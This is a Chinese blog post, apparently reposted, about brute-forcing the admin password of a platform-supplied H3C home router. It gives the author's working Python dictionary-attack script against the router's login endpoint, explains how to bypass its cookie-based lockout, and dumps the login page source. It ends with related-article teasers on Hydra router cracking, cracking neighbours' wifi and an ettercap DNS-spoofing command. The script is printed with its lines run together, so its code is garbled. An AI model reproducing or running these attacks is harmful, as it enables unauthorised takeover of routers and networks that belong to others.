[已实现]暴力破解路由器管理密码

article/2025/9/16 11:14:51

自搬新家以后,第一时间连上网络,登录路由器后台。 博主租的房子是某平台的,网络是由平台提供的。和上次租房不同的地方在于,这次路由器后台管理密码居然和给的wifi连接密码不一样了,肯定是有人改过密码了!admin 等弱口令都试过了,全都不管用!对一个it技术人员来说,被人掌握网络生杀大权肯定是无法容忍的!

第一次测试的时候尝试用telnet登录路由器,发现密码已经被更改,无法登录,预料是跟web控制台密码一起改变的。

没有办法只能去研究web登录界面。

要暴力破解的话,我们需要用代码去构造http请求,因此我们要具备以下条件:

1.登录请求的地址是多少

2.请求格式是怎么样的

3.登录成功以后改如何判断

4.有没有对暴力破解做黑名单限制(有的话我们需要更改mac地址)

5.暴力破解的字典

 

话不多说赶紧去尝试

于是博主去尝试下登录失败以后,有密码错误的提示:

network如下,很明显的同步提交 。了解http的都知道同步表当提交表单data放在body里,以 [参数名]=[值]的形数存放到

这里我们构造请求的请求地址,参数都有了。 

然后我们去判断一下怎么会弹出错误提示的:

因为是同步提交,其实本质上是对页面的跳转,很明显html内容就在response里面,

ctrl+f 一把找到了密码错误的JS ,可以看到 checkPsdFlag是关键checkPsdFlag='flase'。

弹出来的密码错误,在往上面看'true'==checkPsdFlag 是登录成功。

神奇的地方在于checkPsdFlag是resultInfo字符串截取出来的 。

那岂不是这个页面永远都是登录失败?  没错!

记得上面所说的么,这个是同步请求 。因此我怀疑 resultInfo是后台代码渲染出来的,

失败的时候是var resultInfo="false;0"; 成功的时候是var resultInfo="true;0";

证据在下面:当三次登录失败以后,再刷新这个页面:

所以登录成功的条件就是 返回的html里面存在 var resultInfo="true;0";

据我研究这个页面没有记录登录测试,连登录次数都是记录在cookie里的,算是比较幼稚的代码(。≖ˇェˇ≖。)

所以就犯不着修改物理地址去欺骗路由器了。直接暴力破解。

于是写了一段python代码[比较随意写的,只为了破解,就没特意封装  ( ᖛ ̫ ᖛ )ʃ)]

字典比较大,所以遍历文件的时候有个跳过多少行参数[这样今天破解不完 下次直接跳过上次已经读过的行继续往下破解就好了]

# -*- coding: utf-8 -*-import requests
from itertools import islice
import sys
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','Cookie':'LOGINCOUNT=1; LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true'
}def post(passwd):data="psd="+passwdres = requests.post(url="http://192.168.124.1/router_password_mobile.asp",data=data,headers=headers)if('var resultInfo="true;0";' in res.text):return Trueelse:return Falsedef record(content):with open("E:/work/36.4GB-18_in_1.lst/passwd.txt", 'w') as file:file.write(content)def readDic(skip):linenum = skip - 1with open("E:/work/36.4GB-18_in_1.lst/18_in_1.lst", 'r') as file:for line in islice(file,skip,None):linenum = linenum+1line=line.replace('\n',"")res=post(line)print(str(linenum)+" "+line+" "+str(res), end="|")if(res):print("FOUND!")record("FOUND! "+str(linenum)+" "+line+" "+str(res))breakif(linenum%1000 == 0):record(str(linenum)+" "+line+" "+str(res))
if __name__ == "__main__":readDic(0)             

其中record会每1000行记录下行号,在破译成功的时候记录正确的密码。字典的话需要网上自己去下载

然后就可以开始破解了:

记录着 行号 密码 结果

最后贴下路由器返回页面的源码ฅ•ﻌ•ฅ

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<HTML><HEAD>
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META HTTP-EQUIV=Pragma CONTENT=no-cache>
<meta name="viewport" content="user-scalable=0" />
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
<title>H3C&nbsp;Magic R2+Pro千兆版&nbsp设备登录</TITLE>
<LINK Rel="SHORTCUT ICON" href="favicon.ico" type="image/x-icon">
<LINK href=er_globe.css type=text/css rel=stylesheet>
<SCRIPT src=icg_helpScript.js></SCRIPT>
<SCRIPT language=JavaScript src=icg_utils.js></SCRIPT>
<SCRIPT src=utils.js></SCRIPT>
<script src=globalFunctions.js type=text/javascript></script>
<script src=main.js type=text/javascript></script>
<SCRIPT src=Scg_cookie.js></SCRIPT><SCRIPT language=JavaScript>var sys_version = "R2+ProGV100R006L01";
var Product_Type = "R2+ProG";
var mac_addr = "78:2C:29:DF:91:86";
var lan_local_info='192.168.124.1;255.255.255.0;0;78:2C:29:DF:91:86';var PRODUCT_FORUM_URL = "http://bbs.h3c.com";
var PRODUCT_APPLICATION_URL = "http://magic.h3c.com/rest/magic/getApp";
var bPwdIsSyncByAc = 0;
var DefaultLoginflag = 0;
var admin_same_flag = 0;
var IsSupportPcWebOnly = 0;var tt = lan_local_info.split(";");
var ip_addr = tt[0];
var telnumber = "400 600 6363";
var user_level = 1;/*获取系统类型(PC or Mobile)*/
var isMobileSyetem = checkMobile();
var isAppleSystem = checkAndroidOrApp();function wifi_init()
{/*Begin: Added by y09312 of 2015-03-03*//*如果路由器登录页面只是一个子页面,则将其主页面切换为当前登录页面。*/var parentPage = top.window.location.toString().replace(/.*\//,'');parentPage=parentPage.replace(/\?.*/,'');if(parentPage != cPage){top.window.location = cPage;}/*End: Added by y09312 of 2015-03-03*/document.getElementById("psd").value = "";document.router_password_set.psd.focus();
}function onBodyLoad()
{/*刷新登录页面或者提交失败时,清除cookie。*/deleteCookie("USERLOGINIDFLAG");deleteCookie("MAIN_FLAG");deleteCookie("MOBILE_FLAG");wifi_init();var flag = getCookie("PSWMOBILEFLAG");if("true" == flag){var resultInfo="false;0";var resultArray = resultInfo.split(";");var checkPsdFlag = resultArray[0];var sessionid = resultArray[1];if ("true" == checkPsdFlag){/*只有密码验证成功之后,才更新cookie。*/addCookie("USERLOGINIDFLAG", sessionid);deleteCookie("LOGINCOUNT");if (1 == IsSupportPcWebOnly){GURL("home.asp");}else{GURL("mobile.asp");}return;}else if("false" == checkPsdFlag){	    			  /*Begin Modified by y09312 2016-06-16, IDMS: 201606300144, of 解决Web登录用户超过限制时Webs进程挂死问题*/if(1 == sessionid){mobile_display_message("warningmsg", "访问用户个数超过最大限制。");}else{var wrong_logincount = getCookie("LOGINCOUNT");if ("3" == wrong_logincount){deleteCookie("LOGINCOUNT");GURL("wrong_login.asp");}else{mobile_display_message("warningmsg", "密码错误,请重试。");/*首次打开浏览器时,cookie值为空; 在IE中,空为undefined;在firefox中,空可直接判断;其余主流浏览器都在这两种情况内。*/if (("" == wrong_logincount) || ("undefined" == typeof(wrong_logincount))){addCookie("LOGINCOUNT", "1");}else if ("1" == wrong_logincount){addCookie("LOGINCOUNT", "2");}else if ("2" == wrong_logincount){addCookie("LOGINCOUNT", "3");}}									}/*End Modified by y09312 2016-06-16, IDMS: 201606300144, of 解决Web登录用户超过限制时Webs进程挂死问题*/document.getElementById("psd").select();}}/*根据屏幕分辨率,动态调整页面宽度和高度。*/var screen_width = screen.availWidth;var screen_height = screen.availHeight;document.getElementById("formbackground").style.width = screen_width;document.getElementById("formbackground").style.height = screen_height;deleteCookie("PSWMOBILEFLAG");deleteCookie("LOGIN_PSD_REM_FLAG");return;
}function mySubmit()
{var sUserPass = document.getElementById("psd").value;document.getElementById("warningmsg").innerHTML="";document.getElementById("warningmsg").height = 1;if (0 == sUserPass.length){mobile_display_message("warningmsg", "请输入密码。");document.getElementById("psd").focus();return false;}if(document.getElementById("psd_en").checked == true){addCookie("LOGIN_PSD_REM_FLAG", 1);}else{addCookie("LOGIN_PSD_REM_FLAG", 0);}addCookie("PSWMOBILEFLAG", "true");document.router_password_set.submit();return true;
}function GURL(page)
{window.location = page;
}function link(item)
{document.getElementById(item).href = PRODUCT_APPLICATION_URL; document.getElementById(item).target = "_blank";
}function mouseOn(item)
{document.getElementById(item).style.textDecoration= 'underline';
}function mouseOut(item)
{document.getElementById(item).style.textDecoration= 'none';
}function accept_it()
{deleteCookie("LOGINCOUNT");GURL("wrong_login.asp");
}</SCRIPT>
</HEAD>
<body bgcolor=#ffffff leftMargin=0 topMargin=0 MARGINWIDTH=0 MARGINHEIGHT=0 BORDER=0 onload=onBodyLoad()><div id="formbackground" name="formbackground" style="position:absolute; z-index:-1;"><SCRIPT language=JavaScript>if(true == isMobileSyetem){document.write('<img id="bodyimg" name="bodyimg" src="bg_mobile2.jpg" height="100%" width="100%">');}else{document.write('<img id="bodyimg" name="bodyimg" src="bg_pc2.jpg" height="100%" width="100%">');}</SCRIPT>
</div><table id="firstTable" border=0 width="100%" height=60 style="background-color:#4670a9;">
<TR> <TD width=5%></TD><TD width=25%><div align=left><IMG id="go" name="go" src="h3c_logo.png" class=mobileH3cImg onclick="goto_H3C()"></div></TD><TD width=40%></TD><TD width=25%></TD><TD width=5%></TD>
</TR>
</table><FORM action="" method="POST" name=router_password_set>
<TABLE cellSpacing=0 cellPadding=3 border=0 width=100%><TBODY><TR><TD align=center height=20 colspan=3></TD></TR><TR><TD width=10%></TD><TD width=80% align=left height=40><span style="width:100%; height:30; text-align:left; color:#1e5094; font-family:Microsoft YaHei; font-size:16px;">管理密码</span></TD><TD width=10%></TD></TR><TR><TD align=center height=40 colspan=3><INPUT type=password id="psd" name="psd" maxlength="63" style="width:80%;" class=mobileText onkeypress="onEnterSub_Firefox(event,mySubmit,user_level)" onpaste="return false;"><input type=text style="display:none;"></TD></TR><TR><TD WIDTH=10%></TD><TD WIDTH=80% align=left><INPUT id="psd_en" name="psd_en" type=checkbox><span style="height:30; text-align:left; color:#1e5094; font-family:Microsoft YaHei; font-size:13px;">记住密码</span><span>&nbsp</span><span style="height:30; text-align:left; color:#33bcef; font-family:Microsoft YaHei; font-size:13px; cursor:pointer; text-decoration:underline;" onclick="accept_it();" >忘记密码?</span></TD><TD WIDTH=10%></TD></TR><SCRIPT language=JavaScript>if(1 == bPwdIsSyncByAc){document.write('<TR class=textCell>');document.write('<TD colspan=1 width="10%" align=left></TD>');document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')mobile_display_message_shuoming("pass_message", "当前管理密码与管理器的密码一致。");document.write('</TD>');document.write('<TD WIDTH=10%></TD>');document.write('</TR>');}else if(1 == DefaultLoginflag){document.write('<TR class=textCell>');document.write('<TD colspan=1 width="10%" align=left></TD>');document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')mobile_display_message_shuoming("pass_message", "当前为默认密码【admin】。");document.write('</TD>');document.write('<TD WIDTH=10%></TD>');document.write('</TR>');}else if(1 == admin_same_flag){document.write('<TR class=textCell>');document.write('<TD colspan=1 width="10%" align=left></TD>');document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')mobile_display_message_shuoming("pass_message", "当前管理密码与Wi-Fi密码一致。");document.write('</TD>');document.write('<TD WIDTH=10%></TD>');document.write('</TR>');}</SCRIPT>    <TR><TD WIDTH=10%></TD><TD WIDTH=80% align=left class=mobileWarnningTxt id="warningmsg" name="warningmsg"></TD><TD WIDTH=10%></TD></TR><TR><TD align=center height=10 colspan=3></TD></TR><TR><TD align=center height=40 colspan=3><input name="login" id="login" type=button style="WIDTH:80%; HEIGHT:45px;" class=mobileButton value="登录" onclick="mySubmit();"></TD></TR><TR><TD align=center colspan=3><SCRIPT language=JavaScript>/*以下产品支持APP: B1、B1ST、F1、R2+、R2+pro*//*以下产品不支持APP: B0、B3、R100*//*在PC端需显示APP和微信的二维码图片,在移动端只需显示APP的链接*/if (("B3" != Product_Type) && ("B0" != Product_Type) && ("R100" != Product_Type)){/* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */if(true == isMobileSyetem){if("" != PRODUCT_APPLICATION_URL){document.write('<TR><TD height=100 align=center colspan=3 style="FONT-SIZE:16px; FONT-WEIGHT:bold; color:#1c4e92; FONT-FAMILY: "Microsoft YaHei" ! important;">');document.write('<a id="APP_URL" name="APP_URL" style="text-decoration:underline;cursor:pointer; FONT-SIZE:16px; FONT-WEIGHT:bold; color:#1c4e92; FONT-FAMILY: "Microsoft YaHei" ! important;" onclick="link(\'APP_URL\');">点击下载华三魔术家APP</a>');document.write('</TD></TR>');}}/* End modify by w12167, 2015-1-4, IDMS:201601040185 */else{/* Begin modify by w12167,2-15-12-10.IDMS:201511250468 *//* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 *///如果是PC,则推送二维码。document.write('<TR><TD colspan=3>&nbsp;</TD></TR>');document.write('<TR><TD align=center colspan=3>');if ("A210-G" != Product_Type){document.write('<a><img src="magic_app.jpg" border="0" style="height:236px; width:200px;"></a>');document.write('<label>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</label>');}document.write('<a><img src="weixin.jpg" border="0" style="height:236px; width:200px;"></a>');document.write('</TD></TR>');/* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 *//* End modify by w12167,2-15-12-10.IDMS:201511250468 */}}else{/* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */if(true == isMobileSyetem){;}/* End modify by w12167, 2015-1-4, IDMS:201601040185 */else{/* Begin modify by w12167, 2015-12-11, IDMS:201511250468 *//* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 *///如果是PC,则推送二维码。document.write('<TR><TD colspan=3>&nbsp;</TD></TR>');document.write('<TR><TD align=center colspan=3>');document.write('<a><img src="weixin.jpg" border="0" style="height:236px; width:200px;"></a>');document.write('</TD></TR>');/* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 *//* End modify by w12167, 2015-12-11, IDMS:201511250468 */}}</SCRIPT></TD></TR></TBODY>
</TABLE>
</FORM>
</BODY>
</HTML>

 

 


http://chatgpt.dhexx.cn/article/QcOIkOr9.shtml

相关文章

使用 hydra 破解路由器密码

2019独角兽企业重金招聘Python工程师标准>>> hydra 是个网络协议暴力破解工具 ,。。支持很多协议 下面说下怎么使用其破解路由器密码 [root@fedora ~]# hydra Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hyd…

破解路由器管理登录密码

破解路由器管理登录密码 &#xff08;Linux内核&#xff09; 准备工具&#xff1a;puttytel登录软件 正式开工&#xff1a; 第一步&#xff1a;首先检查自己的路由器的系统&#xff0c;看是不是Linux内核的&#xff0c;只有是Linux内核的路由器才适合本教程&#xff0c;常见基于…

路由器密码忘记 五步暴力破解

我是一名家庭用户&#xff0c;最近不小心忘记了家里无线路由器的登录密码&#xff0c;现在唯一知道的就是该设备使用的是5位以内的数字作为密码&#xff0c;那么我想问专家如何来解决这种密码为纯数字的暴力破解问题呢&#xff1f;在线急切等待。 【解答】很多时候我们家庭用户…

安全 | 几种wifi密码破解的思路

文章最早发布在微信公众号“燕幕自安”上&#xff0c;该博客和“燕幕自安”同作者。非经过本人同意&#xff0c;严禁转载。 CONTENT&#xff1a; 一、目的 二、窃取 三、接管 四、操作视频 五、致歉 六、展望 一、目的 今天的目的是破解我那些不认识的小白鼠邻居的路由…

谈谈 DNS 原理及“域名劫持”和“域名欺骗/域名污染”

本文装载自&#xff1a;http://www.apeblog.cn/article/52.html 转载声明&#xff1a;本文转载自网络&#xff0c;如有侵权&#xff0c;请联系删除。 今天拟草一篇介绍服务端配置 HTTPS 教程时突然找到介绍 DNS 的博客&#xff0c;由于他介绍的太赞了、简单粗暴易懂&#xff0…

DNS域名劫持

前言&#xff1a; 局域网内常见的攻击——DNS域名劫持 0x00:什么是域名劫持 域名劫持就是在劫持的网络范围内拦截域名解析的请求&#xff0c;分析请求的域名&#xff0c;把审查范围以外的请求放行&#xff0c;否则直接返回假的IP地址或者什么也不做使得请求失去响应&#xff…

解决 Android 中的 DNS 域名劫持问题

1、文章背景 在客户端进行业务接口请求时&#xff0c;往往会在线上出现解析JSON响应内容失败而导致的应用崩溃&#xff0c;但是在实际开发测试过程中却没有遇到此问题。解决办法就是对JSON解析进行异常捕获&#xff0c;然后将实际响应内容上报到服务端&#xff0c;从而查看具体…

子域名劫持漏洞

转发:原文先知社区:https://xz.aliyun.com/t/2414 在搜资料的时候偶然发现了这么一种子域名劫持&#xff08;Subdomain Takeover&#xff09;漏洞&#xff0c;平时没遇到过&#xff0c;感觉很有趣&#xff0c;可以利用劫持玩出很多花样&#xff0c;同样&#xff0c;HackOne上也…

子域名劫持漏洞详解、挖掘和防护

总之&#xff0c;你挖掘漏洞的方法越奇特&#xff0c;详尽&#xff0c;你所能挖到的东西也就越多。 一、理解子域名劫持漏洞 这个分标题只为了回答一个问题&#xff1a;子域名劫持是怎么形成的、怎么理解它&#xff1f; 一个域名对应着一个提供服务的服务器IP&#xff0c;如何…

Kali渗透-DNS域名劫持

DNS域名劫持 ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.195.132// /192.168.195.2//说明: eth0为Kali本机的网卡名 192.168.195.132 是被攻击机器 192.168.195.2 是局域网的网关地址 打开 Kali 攻击机终端窗口&#xff0c;输入命令vim /etc/ettercap/etter.…

域名劫持原理及实现

目录 1.从输入URL到页面加载发生了什么 2 1.1 DNS解析 2 1.2 TCP连接 2 1.3发送HTTP请求 2 1.4服务器处理请求并返回HTTP报文 2 1.5浏览器解析渲染页面 3 1.6连接结束 4 2.dns劫持 4 3.url重定向 6 3.1.前端实现 6 3.1.1 html页面跳转方式 6 3.1.2 JS页面跳转方式 6 3.2.后端实…

域名劫持的几种方法

科普文。。我看完以后的一个想法就是一但获得了域名的控制权。。如果真想干坏事。那就转移域名。而不只是简单的改DNS。。居然还敢卖域名。。这个第一次看到。。我是好人。。 一. 介绍 在2012年10月24日。社会化分享网站Diigo域名被盗&#xff0c;导致500万用户无法使用网站。…

域名劫持

作者&#xff1a;sarleon 来自&#xff1a;freebuf.com 01 原理 DNS决定的是我们的域名将解析到哪一个IP地址的记录&#xff0c;是基于UDP协议的一种应用层协议 这个攻击的前提是攻击者掌控了你的网关&#xff08;可以是路由器&#xff0c;交换机&#xff0c;或者运营商&#…

域名劫持原理

实验步骤一 实验中提供了一台邮件服务器&#xff0c;该服务器同时提供DNS服务&#xff0c;测试者通过入侵到该服务器&#xff0c;修改DNS服务中的正向解析与反向解析文件实现劫持。 首先我们打开 http://mail.test.com&#xff0c;看到一个邮件登录入口。 这里我们先使用burp…

域名劫持原理与实践

实验简介: 实验所属系列&#xff1a;web安全 实验对象&#xff1a;本科/专科信息安全专业 相关课程及专业&#xff1a;信息网络安全概论 实验时数&#xff08;学分&#xff09;&#xff1a;1学时 实验类别&#xff1a;实践实验类 预备知识&#xff1a; 了解域名及域名劫持 由于…

什么是域名劫持?遇到域名劫持要怎么处理

互联网的应用在我们生活、工作中的应用日益加深&#xff0c;在众多设备的加入下&#xff0c;网络环境也也变得更加复杂。因此&#xff0c;我们在运营网站的过程中&#xff0c;常常出现网站无法打开、或者打开后跳转至其他页面的情况&#xff0c;这就是我们常说的域名劫持。 网…

网站域名被劫持、网站dns被劫持 域名跳转到别的网站的解决方法

网站域名被劫持&#xff0c;网站dns被劫持&#xff0c;域名跳转到别的网站怎么解决&#xff1f; 网站域名被劫持&#xff0c;网站dns被劫持&#xff0c;域名跳转到别的网站怎么解决&#xff1f; 出现网站域名跳转到其他网站&#xff0c;这一现象很可能是域名被劫持。 【网站域名…

【教程分享】大数据视频教程

总预览 下载地址 地址&#xff1a;https://pan.baidu.com/s/1ighogyDQDbMN7Wpe5-VSYg 提取码&#xff1a;rv7h

wpe简介

wpe简介   WPE&#xff08;Winsock Packet Editor&#xff09; 它的中文名称是&#xff1a; 网络封包编辑器 在大多数的编程工具中winsock已经封装成一个控件&#xff0c;成为网络编程的控件&#xff0c;是非常方便的&#xff0c;利用这个控件&#xff0c;编程工具就可以编写…

U盘WPE安装原版Win7系统教程

转载链接&#xff1a;https://jingyan.baidu.com/article/e8cdb32b00472537052bad0b.html 制作U盘pe 1.连接一个空U盘 2.打开pe制作工具&#xff0c;选择安装方式为“U盘” 3.选择好“待写入U盘”&#xff0c;然后点击“立即安装进U盘”&#xff0c;其它默认即可 PS&#xff1…